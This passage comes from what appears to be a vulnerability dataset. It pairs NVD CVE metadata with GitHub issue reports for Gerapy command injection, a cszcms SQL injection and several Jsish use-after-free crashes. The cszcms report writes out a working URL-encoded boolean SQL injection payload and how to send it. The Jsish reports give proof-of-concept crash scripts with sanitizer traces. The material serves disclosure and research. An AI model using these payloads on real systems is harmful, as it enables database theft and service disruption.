"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Gerapy/Gerapy/security/advisories/GHSA-756h-r2c9-qp5j"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://lgtm.com/projects/g/Gerapy/Gerapy?mode=tree&ruleFocus=1505994646253"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://securitylab.github.com/advisories/GHSL-2021-076-gerapy/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gerapy:gerapy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FC824765-CEAB-47C3-A20C-B263A40ABFDE",
"versionEndExcluding": "0.9.9",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"77"
] | 77 | https://github.com/Gerapy/Gerapy/issues/197 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Gerapy",
"Gerapy"
] | Hello,
The [GitHub Security Lab team](https://securitylab.github.com/) has found a potential vulnerability in your project. Please create a [Security Advisory](https://docs.github.com/en/free-pro-team@latest/github/managing-security-vulnerabilities/creating-a-security-advisory) and invite me in to further disclose and discuss the vulnerability details and potential fix. Alternatively, please add a [Security Policy](https://docs.github.com/en/free-pro-team@latest/github/managing-security-vulnerabilities/adding-a-security-policy-to-your-repository) containing a security email address to send the details to.
If you prefer to contact us by email, please reach out to securitylab@github.com with reference to `GHSL-2021-076-gerapy`.
Thank you,
Agustin Gianni
GitHub Security Lab | GitHub Security Lab: Security Contact Needed | https://api.github.com/repos/Gerapy/Gerapy/issues/197/comments | 1 | 2021-05-14T12:11:59Z | 2021-12-26T11:17:19Z | https://github.com/Gerapy/Gerapy/issues/197 | 891,871,512 | 197 | 3,115 |
CVE-2021-32849 | 2022-01-26T22:15:07.903 | Gerapy is a distributed crawler management framework. Prior to version 0.9.9, an authenticated user could execute arbitrary commands. This issue is fixed in version 0.9.9. There are no known workarounds. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 10,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Gerapy/Gerapy/issues/197"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Gerapy/Gerapy/issues/217"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Gerapy/Gerapy/security/advisories/GHSA-756h-r2c9-qp5j"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://lgtm.com/projects/g/Gerapy/Gerapy?mode=tree&ruleFocus=1505994646253"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://securitylab.github.com/advisories/GHSL-2021-076-gerapy/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Gerapy/Gerapy/issues/197"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Gerapy/Gerapy/issues/217"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Gerapy/Gerapy/security/advisories/GHSA-756h-r2c9-qp5j"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://lgtm.com/projects/g/Gerapy/Gerapy?mode=tree&ruleFocus=1505994646253"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://securitylab.github.com/advisories/GHSL-2021-076-gerapy/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gerapy:gerapy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FC824765-CEAB-47C3-A20C-B263A40ABFDE",
"versionEndExcluding": "0.9.9",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"77"
] | 77 | https://github.com/Gerapy/Gerapy/issues/217 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Gerapy",
"Gerapy"
] | The GitHub Security Lab reported a potential security vulnerability (GHSL-2021-076-gerapy) in your project on 2021/05/13. It has been 90 days since our initial report and as per our coordinated disclosure policy, we intend to publish a public advisory detailing this issue. If you do wish to further coordinate a response to this issue with the GitHub Security Lab, please contact us at securitylab@github.com within the next 7 days in reference to GHSL-2021-076-gerapy and we would love to help you resolve these issues. If not, feel free to close this issue after which we will proceed with advisory publication. | Security Issue: GHSL-2021-076-gerapy | https://api.github.com/repos/Gerapy/Gerapy/issues/217/comments | 2 | 2021-11-22T09:05:04Z | 2022-01-09T21:14:47Z | https://github.com/Gerapy/Gerapy/issues/217 | 1,059,877,092 | 217 | 3,116 |
CVE-2021-46377 | 2022-01-27T18:15:07.813 | There is a front-end sql injection vulnerability in cszcms 1.2.9 via cszcms/controllers/Member.php#viewUser | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cskaza/cszcms/issues/33"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cskaza/cszcms/issues/33"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cskaza:cszcms:1.2.9:*:*:*:*:*:*:*",
"matchCriteriaId": "A08F592A-91EF-4922-994E-A44A05BBA747",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/cskaza/cszcms/issues/33 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cskaza",
"cszcms"
] | Hi, I found a front-end sql injection vulnerability in cszcms-1.2.9
The vulnerable code is on `cszcms\controllers\Member.php#viewUser`
The `$this->uri->segment(3)` parameter here can be controlled by the user

And no filtering leads to sql injection vulnerability

First register a user in the foreground, then log in, then visit
`/member/viewUser/%27%7c%7c%69%66%28%28%6c%65%6e%67%74%68%28%64%61%74%61%62%61%73%65%28%29%29%3e%31%29%2c%31%2c%30%29%23`
```
%27%7c%7c%69%66%28%28%6c%65%6e%67%74%68%28%64%61%74%61%62%61%73%65%28%29%29%3e%31%29%2c%31%2c%30%29%23
=>
'||if((length(database())>1),1,0)#
```
The content returned by the webpage is:

visit
`/member/viewUser/%27%7c%7c%69%66%28%28%6c%65%6e%67%74%68%28%64%61%74%61%62%61%73%65%28%29%29%3c%31%29%2c%31%2c%30%29%23`
```
%27%7c%7c%69%66%28%28%6c%65%6e%67%74%68%28%64%61%74%61%62%61%73%65%28%29%29%3c%31%29%2c%31%2c%30%29%23
=>
'||if((length(database())<1),1,0)#
```
The content returned by the webpage is:

It's a Boolean-based SQL injection
Suggest: Add a filter function to this parameter
| Bug Report: There is a front-end boolean-based sql injection vulnerability | https://api.github.com/repos/cskaza/cszcms/issues/33/comments | 0 | 2022-01-14T09:13:29Z | 2022-01-14T09:13:29Z | https://github.com/cskaza/cszcms/issues/33 | 1,103,315,429 | 33 | 3,117 |
CVE-2021-46484 | 2022-01-27T21:15:08.343 | Jsish v3.5.0 was discovered to contain a heap-use-after-free via Jsi_IncrRefCount in src/jsiValue.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/73"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/73"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/pcmacdon/jsish/issues/73 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case1
```javascript
function JSEtest(assert)
{
(arr.concat([]), false, 'JSEtest');
}
var arr = /x?y?z?/.exec("abcd");
arr[arr[arr['JSEtest'[arr[1000] = 3]] = 3] = 3](arr.every(JSEtest), false, 'JSEtest');
```
###### Test case2
```javascript
var list = [
'aa',
'bb',
'cc',
'dd',
'hhh',
'mm',
'nn'
];
'sort:' + list.sort(function (_str, position) {
var s = 'sort:' + list.sort(function (str, position) {
var s = 'shift:' + list.shift();
}) + list.shift();
});
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
==114358==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000007060 at pc 0x556541bb6a68 bp 0x7ffd4e8abbc0 sp 0x7ffd4e8abbb0
READ of size 4 at 0x603000007060 thread T0
#0 0x556541bb6a67 in Jsi_IncrRefCount src/jsiValue.c:34
#1 0x556541d0aab5 in Jsi_ObjNewArray src/jsiObj.c:480
#2 0x556541c75f14 in jsi_ArrayFindSubCmd src/jsiArray.c:573
#3 0x556541c75f14 in jsi_ArrayEveryCmd src/jsiArray.c:663
#4 0x556541c31818 in jsi_FuncCallSub src/jsiProto.c:244
#5 0x556541efb71a in jsiFunctionSubCall src/jsiEval.c:796
#6 0x556541efb71a in jsiEvalFunction src/jsiEval.c:837
#7 0x556541efb71a in jsiEvalCodeSub src/jsiEval.c:1264
#8 0x556541f0f15e in jsi_evalcode src/jsiEval.c:2204
#9 0x556541f13274 in jsi_evalStrFile src/jsiEval.c:2665
#10 0x556541c0266a in Jsi_Main src/jsiInterp.c:936
#11 0x55654240703a in jsi_main src/main.c:47
#12 0x7f7e9588dbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#13 0x556541b96969 in _start (/usr/local/bin/jsish+0xe8969)
0x603000007060 is located 0 bytes inside of 32-byte region [0x603000007060,0x603000007080)
freed by thread T0 here:
#0 0x7f7e964fc7a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8)
#1 0x556541bb76cf in Jsi_DecrRefCount src/jsiValue.c:52
previously allocated by thread T0 here:
#0 0x7f7e964fcd28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28)
#1 0x556541c07aa4 in Jsi_Calloc src/jsiUtils.c:57
SUMMARY: AddressSanitizer: heap-use-after-free src/jsiValue.c:34 in Jsi_IncrRefCount
Shadow bytes around the buggy address:
0x0c067fff8db0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
0x0c067fff8dc0: fd fd fa fa 00 00 04 fa fa fa 00 00 04 fa fa fa
0x0c067fff8dd0: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
0x0c067fff8de0: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
0x0c067fff8df0: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
=>0x0c067fff8e00: fd fd fd fd fa fa 00 00 00 00 fa fa[fd]fd fd fd
0x0c067fff8e10: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
0x0c067fff8e20: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
0x0c067fff8e30: 00 00 00 00 fa fa 00 00 00 00 fa fa fa fa fa fa
0x0c067fff8e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8e50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
```
| Heap-use-after-free src/jsiValue.c:34 in Jsi_IncrRefCount | https://api.github.com/repos/pcmacdon/jsish/issues/73/comments | 1 | 2021-12-24T10:41:10Z | 2021-12-28T03:39:04Z | https://github.com/pcmacdon/jsish/issues/73 | 1,088,307,699 | 73 | 3,118 |
CVE-2021-46489 | 2022-01-27T21:15:08.603 | Jsish v3.5.0 was discovered to contain a heap-use-after-free via Jsi_DecrRefCount in src/jsiValue.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/74"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/74"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/pcmacdon/jsish/issues/74 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
function JSEtest() {
Object.prototype = 1;
}
JSEtest();
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
==44651==ERROR: AddressSanitizer: heap-use-after-free on address 0x6030000001c0 at pc 0x5556b3bd8724 bp 0x7ffdd9e16980 sp 0x7ffdd9e16970
READ of size 4 at 0x6030000001c0 thread T0
#0 0x5556b3bd8723 in Jsi_DecrRefCount src/jsiValue.c:41
#1 0x5556b3c1177b in jsiInterpDelete src/jsiInterp.c:1933
#2 0x5556b4428047 in jsi_main src/main.c:49
#3 0x7fd6540bcbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#4 0x5556b3bb7969 in _start (/usr/local/bin/jsish+0xe8969)
0x6030000001c0 is located 0 bytes inside of 32-byte region [0x6030000001c0,0x6030000001e0)
freed by thread T0 here:
#0 0x7fd654d2b7a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8)
#1 0x5556b3bd86cf in Jsi_DecrRefCount src/jsiValue.c:52
previously allocated by thread T0 here:
#0 0x7fd654d2bd28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28)
#1 0x5556b3c28aa4 in Jsi_Calloc src/jsiUtils.c:57
SUMMARY: AddressSanitizer: heap-use-after-free src/jsiValue.c:41 in Jsi_DecrRefCount
Shadow bytes around the buggy address:
0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff8000: fa fa fd fd fd fd fa fa fd fd fd fa fa fa fd fd
0x0c067fff8010: fd fd fa fa fd fd fd fa fa fa fd fd fd fd fa fa
0x0c067fff8020: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
=>0x0c067fff8030: fa fa fd fd fd fd fa fa[fd]fd fd fd fa fa fd fd
0x0c067fff8040: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
0x0c067fff8050: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
0x0c067fff8060: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
0x0c067fff8070: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
0x0c067fff8080: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
```
| Heap-use-after-free src/jsiValue.c:41 in Jsi_DecrRefCount | https://api.github.com/repos/pcmacdon/jsish/issues/74/comments | 0 | 2021-12-24T10:41:50Z | 2021-12-27T15:24:09Z | https://github.com/pcmacdon/jsish/issues/74 | 1,088,308,024 | 74 | 3,119 |
CVE-2021-46494 | 2022-01-27T21:15:08.777 | Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_ValueLookupBase in src/jsiValue.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/78"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/78"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/pcmacdon/jsish/issues/78 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
var JSEtest = function() {};
Function.prototype = 12;
var obj = JSEtest.bind({});
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
=================================================================
==50188==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000000228 at pc 0x55ccf1df02ee bp 0x7ffcb1d1b0a0 sp 0x7ffcb1d1b090
READ of size 1 at 0x603000000228 thread T0
#0 0x55ccf1df02ed in jsi_ValueLookupBase src/jsiValue.c:980
#1 0x55ccf1df1175 in jsi_ValueLookupBase src/jsiValue.c:1007
#2 0x55ccf1df1175 in jsi_ValueSubscript src/jsiValue.c:1016
#3 0x55ccf211ad47 in jsiEvalSubscript src/jsiEval.c:997
#4 0x55ccf211ad47 in jsiEvalCodeSub src/jsiEval.c:1283
#5 0x55ccf213315e in jsi_evalcode src/jsiEval.c:2204
#6 0x55ccf2137274 in jsi_evalStrFile src/jsiEval.c:2665
#7 0x55ccf1e2666a in Jsi_Main src/jsiInterp.c:936
#8 0x55ccf262b03a in jsi_main src/main.c:47
#9 0x7fc99b738bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#10 0x55ccf1dba969 in _start (/usr/local/bin/jsish+0xe8969)
0x603000000228 is located 8 bytes inside of 32-byte region [0x603000000220,0x603000000240)
freed by thread T0 here:
#0 0x7fc99c3a77a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8)
#1 0x55ccf1ddb6cf in Jsi_DecrRefCount src/jsiValue.c:52
previously allocated by thread T0 here:
#0 0x7fc99c3a7d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28)
#1 0x55ccf1e2baa4 in Jsi_Calloc src/jsiUtils.c:57
SUMMARY: AddressSanitizer: heap-use-after-free src/jsiValue.c:980 in jsi_ValueLookupBase
Shadow bytes around the buggy address:
0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff8000: fa fa 00 00 00 00 fa fa 00 00 07 fa fa fa 00 00
0x0c067fff8010: 00 00 fa fa 00 00 03 fa fa fa 00 00 00 00 fa fa
0x0c067fff8020: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
0x0c067fff8030: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
=>0x0c067fff8040: 00 00 fa fa fd[fd]fd fd fa fa 00 00 00 00 fa fa
0x0c067fff8050: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
0x0c067fff8060: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
0x0c067fff8070: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
0x0c067fff8080: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
0x0c067fff8090: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==50188==ABORTING
```
Credits: Found by OWL337 team. | Heap-use-after-free src/jsiValue.c:980 in jsi_ValueLookupBase | https://api.github.com/repos/pcmacdon/jsish/issues/78/comments | 0 | 2021-12-24T10:45:48Z | 2022-01-12T02:16:10Z | https://github.com/pcmacdon/jsish/issues/78 | 1,088,309,877 | 78 | 3,120 |
